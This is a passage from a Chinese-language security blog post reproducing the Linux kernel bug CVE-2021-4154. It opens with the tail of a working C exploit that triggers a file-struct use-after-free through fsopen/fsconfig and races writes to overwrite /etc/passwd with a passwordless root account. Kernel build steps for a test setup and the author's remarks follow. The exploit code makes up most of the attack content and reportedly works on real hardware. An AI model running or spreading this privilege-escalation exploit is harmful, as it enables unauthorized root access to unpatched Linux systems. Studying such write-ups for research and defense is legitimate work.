system("mkdir exp_dir");
system("touch exp_dir/data");
system("chmod -R 777 exp_dir/");
}

void create_uaf()
{
system("cd exp_dir");
system("ln -s data exp_dir/uaf");
system("cd ../");

puts("[*] prepare create uaf");
fscontext_fd = syscall(__NR_fsopen, "cgroup", FSOPEN_CLOEXEC);
if (fscontext_fd < 0)
err_exit("fsopen failed!");

uaf_fd = open("exp_dir/uaf", 1);
if (uaf_fd < 0)
err_exit("open uaf failed!");

syscall(__NR_fsconfig, fscontext_fd, FSCONFIG_SET_FD, "source", NULL, uaf_fd);
close(fscontext_fd);
}


void * large_write()
{
tmp_fd = open("exp_dir/uaf", 1);
if (tmp_fd < 0)
err_exit("open tmp failed!");
puts("[*] mmap 1G size data");
for (int i = 0; i < PAGE_NUM; i++)
{
void * ret = mmap((void*)start_addr + 0x1000*i , 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
if (!ret)
err_exit("mmap failed!");
}

large_write_flag = 1;
if (write(tmp_fd, start_addr, 0x1000*(PAGE_NUM-1)) < 0)
err_exit("large write failed!");

puts("[*] large write success!");
close(tmp_fd);
}

void * passwd_write()
{
char passwd[1024] = "shell::0:0:root:/root:/bin/bash\n";
puts("[*] try to overwrite /etc/passwd");
while (!large_write_flag) {}

passwd_write_flag = 1;
if (write(uaf_fd, passwd, strlen(passwd)) < 0)
err_exit("overwrite /etc/passwd failed!");

puts("[*] overwrite /etc/passwd success");
}

void file_struct_spray()
{
while (!passwd_write_flag) {}

puts("[*] start try to hit uaf file struct");
for (int i = 0; i < FILE_NUM; i++)
{
target_fd[i] = open("/etc/passwd", O_RDONLY);
if (target_fd[i] < 0){
printf("failed at %d target file\n", i);
err_exit("failed!");
}

if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, uaf_fd, target_fd[i]) == 0)
{
victim_fd = target_fd[i];
printf("[*] victim_fd is %d\n", victim_fd);
flag = 1;
for (int j = 0; j < i; j++)
close(target_fd[i]);
break;
}
}

if (!flag)
err_exit("failed to find victim_fd");

}

int main(int argc, char * argv[], char * envp[])
{

init_namespace();
create_dir();

create_uaf();

pthread_create(&large_write_thread, NULL, large_write, NULL);
usleep(1);
pthread_create(&passwd_write_thread, NULL, passwd_write, NULL);

file_struct_spray();

pthread_exit(NULL);
return 0;
}

最终在真机中的运行效果

不用泄露地址,真的就像🐍出来一样爽啊

some thricks

虽然笔者在上一篇文章中提了一种比较方便的替换复现环境内核的方法,但是吧,还是会遇到许多问题。

就像笔者这次试了5.4和5.8的五六个generic版本,要么就是patch了CVE,要么就是不能稳定运行(大概十次只能成功一次,而且有时候覆写的data一变就8行了)所以笔者还是回归了最原始的方法,直接本地编译一个替换

先把源码放到/usr/src下,解压

1
2
3
4
cp ~/linux-5.8.tar.gz /usr/src
cd /usr/src
tar -xf ./linux-5.8.tar.gz
cd ./linux-5.8

编译

1
2
make menuconfig	#默认选项,直接退出就行
make all -j8 #时间可能会比较长

编译模块

1
2
make INSTALL_MOD_STRIP=1 modules_install #也可以不加INSTALL_MOD_STRIP=1,但是鼠鼠不能保证启动地时候加载600多MB的inid不会卡死呦😋
make install

更新gurb并重启

1
2
update-grub
reboot

然后就是进入高级模式选择5.8版本的内核启动啦

0xff:写在最后的最后

笔者为了图省事,在最后用了dirtycred完成了提权

但是作为一个21年的CVE,原本的exp其实采用了CROSS-CACHE OVERFLOW这一手法完成利用

主要是铸币笔者实在不是很用的明白CROSS-CHACHE OVERFLOW,所以直接逃课了😋

但估计接下来笔者会写个专题专门练练👊👊👊

refer

https://blingblingxuanxuan.github.io/2023/05/19/230518-cve-2021-4154

新一代mount系统调用(1)——接口初探 - 知乎 (zhihu.com)


CVE-2021-4154 Remake
http://example.com/2024/03/28/dirtycred/
作者
korey0sh1
发布于
2024年3月28日
许可协议